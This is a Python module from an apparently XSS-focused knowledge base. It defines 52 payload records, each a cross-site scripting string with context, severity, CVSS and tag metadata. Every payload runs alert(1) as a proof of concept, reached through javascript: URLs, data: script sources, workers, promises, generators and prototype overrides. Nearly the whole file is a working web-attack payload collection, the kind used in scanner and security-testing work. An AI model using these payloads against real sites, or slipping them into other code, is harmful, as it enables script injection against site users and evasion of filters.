#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Advanced Core Payloads - Part 2
"""

from typing import Dict

from ..models import PayloadEntry


ADVANCED_CORE_PAYLOADS_PART2: Dict[str, PayloadEntry] = {
    "advanced_053": PayloadEntry(
        payload="<script>frames[0].alert(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_054": PayloadEntry(
        payload="<script>document.defaultView.alert(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_055": PayloadEntry(
        payload="<script>document.parentWindow.alert(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_056": PayloadEntry(
        payload='<script>document.createElement("script").src="data:,alert(1)"</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_057": PayloadEntry(
        payload='<script>document.body.appendChild(document.createElement("script")).src="data:,alert(1)"</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_058": PayloadEntry(
        payload='<script>location="javascript:alert(1)"</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_059": PayloadEntry(
        payload='<script>location.href="javascript:alert(1)"</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_060": PayloadEntry(
        payload='<script>location.replace("javascript:alert(1)")</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_061": PayloadEntry(
        payload='<script>location.assign("javascript:alert(1)")</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_062": PayloadEntry(
        payload='<script>var s=document.createElement("script");s.src="data:,alert(1)";document.head.appendChild(s)</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_063": PayloadEntry(
        payload='<script>document.head.innerHTML+="<script>alert(1)</script>"</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_064": PayloadEntry(
        payload='<script>document.body.innerHTML="<script>alert(1)</script>"</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_065": PayloadEntry(
        payload='<script>document.write("<script>alert(1)</script>")</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_066": PayloadEntry(
        payload="<script>document.body.onclick=alert</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_067": PayloadEntry(
        payload="<script>document.body.onmouseover=function(){alert(1)}</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_068": PayloadEntry(
        payload='<script>document.addEventListener("click",alert)</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_069": PayloadEntry(
        payload='<script>window.addEventListener("load",function(){alert(1)})</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_070": PayloadEntry(
        payload="<script>Object.prototype.alert=alert;[].alert(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_071": PayloadEntry(
        payload="<script>Object.prototype.valueOf=alert;1+{}</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_072": PayloadEntry(
        payload='<script>Object.prototype.toString=alert;1+""</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_073": PayloadEntry(
        payload="<script>Array.prototype.join=alert;[1].join()</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_074": PayloadEntry(
        payload='<script>Array.prototype.toString=alert;[1]+""</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_075": PayloadEntry(
        payload="<script>Array.prototype.valueOf=alert;+[]</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_076": PayloadEntry(
        payload="<script>Function.prototype.call=alert;eval.call()</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_077": PayloadEntry(
        payload="<script>Function.prototype.apply=alert;eval.apply()</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_078": PayloadEntry(
        payload="<script>Function.prototype.bind=alert;eval.bind()</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_079": PayloadEntry(
        payload='<script>String.prototype.match=alert;"".match()</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_080": PayloadEntry(
        payload='<script>String.prototype.replace=alert;"".replace()</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_081": PayloadEntry(
        payload='<script>String.prototype.search=alert;"".search()</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_082": PayloadEntry(
        payload="<script>Promise.resolve().then(()=>alert(1))</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_083": PayloadEntry(
        payload="<script>new Promise(resolve=>resolve(alert(1)))</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_084": PayloadEntry(
        payload="<script>Promise.reject().catch(()=>alert(1))</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_085": PayloadEntry(
        payload="<script>Promise.all([]).then(()=>alert(1))</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_086": PayloadEntry(
        payload="<script>Promise.race([]).then(()=>alert(1))</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_087": PayloadEntry(
        payload="<script>async function x(){await alert(1)}x()</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_088": PayloadEntry(
        payload="<script>(async()=>await alert(1))()</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_089": PayloadEntry(
        payload="<script>async function*x(){yield alert(1)}x().next()</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_090": PayloadEntry(
        payload="<script>function*x(){yield alert(1)}x().next()</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_091": PayloadEntry(
        payload="<script>(function*(){yield alert(1)})().next()</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_092": PayloadEntry(
        payload="<script>queueMicrotask(()=>alert(1))</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_093": PayloadEntry(
        payload="<script>process.nextTick(()=>alert(1))</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_094": PayloadEntry(
        payload="<script>setTimeout(()=>alert(1))</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_095": PayloadEntry(
        payload="<script>setInterval(()=>alert(1),1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_096": PayloadEntry(
        payload="<script>setImmediate(()=>alert(1))</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_097": PayloadEntry(
        payload='<script>new Worker("data:,alert(1)")</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_098": PayloadEntry(
        payload='<script>new Worker("data:application/javascript,alert(1)")</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_099": PayloadEntry(
        payload='<script>new SharedWorker("data:,alert(1)")</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_100": PayloadEntry(
        payload='<script>navigator.serviceWorker.register("data:,alert(1)")</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_101": PayloadEntry(
        payload="<script>navigator.serviceWorker.getRegistration().then(r=>r.update())</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_102": PayloadEntry(
        payload='<script>importScripts("data:,alert(1)")</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_103": PayloadEntry(
        payload='<script>import("data:,alert(1)")</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_104": PayloadEntry(
        payload='<script>Reflect.construct(Function,["alert(1)"])()</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
}
